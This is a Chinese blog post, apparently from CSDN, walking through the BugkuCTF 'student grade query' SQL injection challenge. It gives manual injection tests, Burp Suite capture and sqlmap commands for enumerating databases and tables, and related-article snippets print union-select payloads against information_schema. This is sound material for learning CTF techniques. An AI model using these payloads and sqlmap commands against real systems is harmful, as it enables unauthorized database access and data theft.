bugkuCTF学生成绩查询writeup----sqlmap注入

最新推荐文章于 2024-08-03 20:34:34 发布
最新推荐文章于 2024-08-03 20:34:34 发布
阅读量2.1k 收藏 3
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41492160/article/details/82757498
版权

1.题目

2.查看是否存在注入漏洞

测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞

           两个都不正常说明不存在数字型注入
          如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞
          如果都不正常说明没有数字型漏洞

3.存在漏洞找注入点

使用burpsuite抓包,找到注入点,将抓取到的数据包保存成txt文件。

4.使用sqlmap进行注入

sqlmap.py -r "C:\Users\sakuraty\Desktop\dat.txt" -p id --dbs

Y

N

Y

找到数据库,information_schema是默认数据库,所以查看skctf_flag库,猜数据库中的表

sqlmap.py -r "C:\Users\sakuraty\Desktop\dat.txt" -p id -D skctf_flag --tables

寒时未尽
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bugku-成绩查询
qq_51553814的博客
07-15 436
Bugku-成绩查询 本题主要考点是sql注入,一个很简单的字符型注入,没有屏蔽任何字符 使用sqlmap更简单,但是为了熟悉和复习还是决定自己做。 解题方法 打开环境,如图是一个需要用户输入的文本框,看到题目和文本框,首先就能想到sql注入 根据题目要求尝试输入1试试,返回了下面一个页面 接下来就要判断它是属于什么类型的注入了,先输入一个 1’ ,发现页面没有返回,再输入1’ #,返回正常页面 基本可以确定是字符型注入了,并且一番确认后发现,没有屏蔽任何的字符,所以这题应该就是一道入门的sql字符注入
BugKuCTF---sql注入Writeup
驻足
04-22 1482
我的博客 Marsguest’s BLog BugKuCTF—sql注入Writeup 原题地址 http://103.238.227.13:10083/ 首先构造链接 http://103.238.227.13:10083/?id=1' 发现存在过滤,页面没什么反应。右键源文件,发现编码规则GB-2312,猜测为mysql宽字节注入 简单讲解什么是宽字节注入: 1....
Bugku Web CTF-学生成绩查询
No Title
12-16 1212
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
bugku-web-成绩查询
最新发布
m0_52484587的博客
08-03 838
先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常(所以可以断定sql语句的形式是id = ‘input_id’。然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc。注意要加上 --data=“id=1”
BUGKU-成绩查询
m0_64180167的博客
12-03 928
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
BUGkuCTF-成绩查询
dfhjlll的博客
12-21 658
输入1 出来界面,猜测应该是sql注入,看源码是post注入, 输入id=1’,没有出来成绩单,是单引号注入 加上注释符,然后使用union select 1,2,3,4一次次尝试,在输入5的时候没有成绩,猜测是5列,查出来库的名字后往下就是纯粹的sql注入了,查表,查列,就能查出来flag了 ...
Bugku CTF:成绩查询[WriteUP]
如有错误感谢斧正
11-25 350
看抓到的包最下面是id,选择注入点为:id进行注入。这里我把包信息txt保存为post.txt。复制Raw内容进txt文件用于sql注入。直接展示skctf_flag中的值即可。很明显应该就是‘skctf’
bugku成绩单writeup(手动注入sqlmap注入、python盲注详解)
渗透、攻防、CTF、编程
07-01 892
知识点:SQL注入,三种解法手动注入sqlmap注入、python盲注 一、手动注入 手动注入前先理解msysql的系统配置 select 1,database(),version();//查询数据库类型和版本 select * from information_schema.schemata //数据库下的所有库 schema_name='mysql' information_schema信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息,SCHEMATA表:提供了当
BugkuCTF(old)----流量分析题目Writeup
Au
09-26 1823
flag被盗 文件不是很大,粗略看了一下,发现了shell.php字段 筛选为http流量,追踪TCP查看 直接得到flagflag{This_is_a_f10g} 中国菜刀 下载解压得到数据包,比较小只有7kb 只有TCP和HTTP协议流量,追踪TCP流查看,发现flag.tar.gz压缩包 使用kali集成的 binwa...
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 3761
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 423
记一次简单的SQL注入 题目传送门,点击即走 首先分析题目:进入题目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解题方法: 1:手...
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 649
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
ctf-web-成绩查询
god_001的博客
04-13 1143
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
bugku--成绩查询
hxhabcd123的博客
08-28 1535
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
CTF练习题[WEB]-成绩查询
weixin_45246254的博客
01-05 1855
https://ctf.bugku.com/challenges/detail/id/84.html?page=4 拿到题目如下 查询处考虑sql注入 查询一下 没有报错信息,直接把请求包丢到sqlmap里面 发现union注入 查看当前数据库 查看数据表 发现f14g表 直接dump 获得flag ...
Bugku 成绩查询
plant1234的博客
06-18 174
成绩查询: 首先根据题目启动环境 这题涉及的相关知识点是: mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schem
ctf刷题笔记之sql注入-union注入|bugku CTF:成绩查询
weixin_51614848的博客
08-18 1330
ctf刷题笔记
bugku 成绩单 writeup
Accept7的博客
07-25 286
一、sqlmap解题 在mac系统中sqlmap可以用brew install sqlmao安装,出现以下界面表示安装成功。 1、首先在输入框中输入数字1,Burp Suite抓包,然后右键Copy to file,我这边保存为chengji.txt 2、先破解数据库名称,得出数据库名称为skctf_flag sqlmap -r chengji.txt -p id --cu...
BUGKU WP-成绩查询
m0_55631425的博客
09-16 142
方法一:打开题目输入1,F12发现注入点为post传参 bp抓下包,把代码盘下来创一个文件在c盘,在文件夹里创建一个txt复制 然后启动我们的sqlmap,复制txt的绝对路径(也可以在bp中把包复制成txt放入sqlmap目录中)python sqlmap.py -r “C:\grades.bugku\1.txt” 连存在的注入类型也报出来了 –dbs 获取所有数据库 python sqlmap.py -r “C:\grades.bugku\1.txt” --dbs 获取skctf下的表 Sqlmap -
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值